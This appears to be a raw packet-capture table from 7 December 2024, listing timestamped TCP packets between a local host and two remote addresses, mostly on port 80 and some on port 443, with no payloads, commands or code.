Dec 7, 2024 10:51:51.789091110 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.789829969 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.789900064 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.789906979 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.789938927 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.790752888 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.790802956 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.790838003 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.790873051 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.791609049 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.791651011 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.791703939 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.791739941 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.792505980 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.792563915 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.792609930 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.792680979 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.793412924 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.793505907 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.793529034 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.793545961 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.794328928 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.794370890 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.794414997 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.794500113 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.795248985 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.795272112 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.795290947 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.795309067 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.796132088 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.796176910 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.796238899 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.796349049 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.797061920 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.797116041 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.797148943 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.797180891 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.797940969 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.798024893 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.798062086 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.798098087 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.798846006 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.798894882 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.798964024 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.799010038 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.799772024 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.799813032 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.799880981 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.799917936 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.800717115 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.800785065 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.800829887 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.801616907 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.801661015 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.801690102 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.801723003 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.802458048 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.802500010 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.802563906 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.802639961 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.803369999 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.803416014 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.803503036 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.803544998 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.804292917 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.804347992 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.804430008 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.804467916 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.805180073 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.805233955 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.805293083 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.805335999 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.806118011 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.806163073 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.806204081 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.806236029 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.807019949 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.807075024 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.807076931 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.807109118 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.807904005 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.807961941 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.808000088 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.808032990 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.808820009 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.808901072 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.809102058 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.809154987 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.809178114 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.809730053 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.809803009 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.809837103 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.809874058 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.810681105 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.810733080 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.810760021 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.810794115 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.811538935 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.811592102 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.811624050 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.811661005 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.812454939 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.812500954 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.812537909 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.812572956 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.813349962 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.813395023 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.813426971 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.813463926 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.814285994 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.814336061 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.889421940 CET	443	49832	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:51.889492989 CET	443	49832	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:51.889636040 CET	49832	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:51.889811039 CET	49832	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:51.889839888 CET	443	49832	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:51.889856100 CET	49832	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:51.889861107 CET	443	49832	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:51.893274069 CET	49834	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:51.893313885 CET	443	49834	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:51.893553019 CET	49834	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:51.893553019 CET	49834	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:51.893589020 CET	443	49834	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:51.916028023 CET	443	49829	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:51.916109085 CET	443	49829	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:51.916233063 CET	49829	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:51.916487932 CET	49829	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:51.916487932 CET	49829	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:51.916503906 CET	443	49829	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:51.916512966 CET	443	49829	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:51.919722080 CET	49835	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:51.919775009 CET	443	49835	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:51.920320034 CET	49835	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:51.920407057 CET	49835	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:51.920418978 CET	443	49835	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:51.926140070 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.926322937 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.926512957 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.926542997 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.926641941 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.926700115 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.926810980 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.927663088 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.927700996 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.928080082 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.928467035 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.928569078 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.928719997 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.929321051 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.929411888 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.929529905 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.930129051 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.930253029 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.930308104 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.931025982 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.931143045 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.931163073 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.931855917 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.931917906 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.932041883 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.932095051 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.932187080 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.932835102 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.932931900 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.932993889 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.933792114 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.933845997 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.933868885 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.934647083 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.934812069 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.934834003 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.935111046 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.935681105 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.935765028 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.935797930 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.936506033 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.936527967 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.936564922 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.936583996 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.936649084 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.937376022 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.937470913 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.937530994 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.937530994 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.938304901 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.938400984 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.938414097 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.938508034 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.939234018 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.939354897 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.939389944 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.940073967 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.940162897 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.940181971 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.940721035 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.974164009 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.974309921 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.974566936 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.974584103 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.974651098 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.974731922 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.974886894 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.975555897 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.975657940 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.975745916 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.976530075 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.976589918 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.976947069 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.977349043 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.977478981 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.977504969 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.978220940 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.978331089 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.978333950 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.978445053 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.979147911 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.979207039 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.979271889 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.980016947 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.980140924 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.980169058 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.980429888 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.980977058 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.981081963 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.981108904 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.981878042 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.982004881 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.982028961 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.982321024 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.982783079 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.982968092 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.982988119 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.983083010 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.983727932 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.983805895 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.983833075 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.984654903 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.984682083 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.984725952 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.984725952 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.984837055 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.985502958 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.985610962 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.985748053 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.986475945 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.986552000 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.986582041 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.987291098 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.987413883 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.987437010 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.987751007 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.988516092 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.988529921 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.988660097 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.989157915 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.989250898 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.989276886 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.990042925 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.990156889 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.990164042 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.990246058 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.990947962 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.991080999 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.991394997 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.991842031 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.991966963 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.991997957 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.992238998 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.992798090 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.992873907 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.993016958 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.993653059 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.993753910 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.994040966 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.994565010 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.994735956 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.994755983 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.994817972 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.995490074 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.995512962 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.995573997 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.995573997 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.996391058 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.996494055 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.996520996 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.996675014 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.997273922 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.997387886 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.997412920 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.998313904 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.998411894 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.998435020 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.998756886 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.999116898 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.999187946 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.999212027 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.999994040 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.000108004 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.000135899 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.000148058 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.000916958 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.001023054 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.001049995 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.001146078 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.001806974 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.001925945 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.001959085 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.002124071 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.002717972 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.002821922 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.002849102 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.003671885 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.003839970 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.003863096 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.004158974 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.004515886 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.004662037 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.004687071 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.005460024 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.005574942 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.005577087 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.005680084 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.006378889 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.006781101 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.077095985 CET	443	49830	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:52.077168941 CET	443	49830	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:52.077599049 CET	443	49831	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:52.077656031 CET	443	49831	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:52.077716112 CET	49831	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:52.077723026 CET	49830	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:52.077723026 CET	49830	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:52.077768087 CET	49830	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:52.077784061 CET	443	49830	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:52.077930927 CET	49831	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:52.077949047 CET	443	49831	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:52.077969074 CET	49831	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:52.077975035 CET	443	49831	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:52.079930067 CET	443	49833	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:52.079999924 CET	443	49833	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:52.080076933 CET	49833	443	192.168.2.6	13.107.246.63
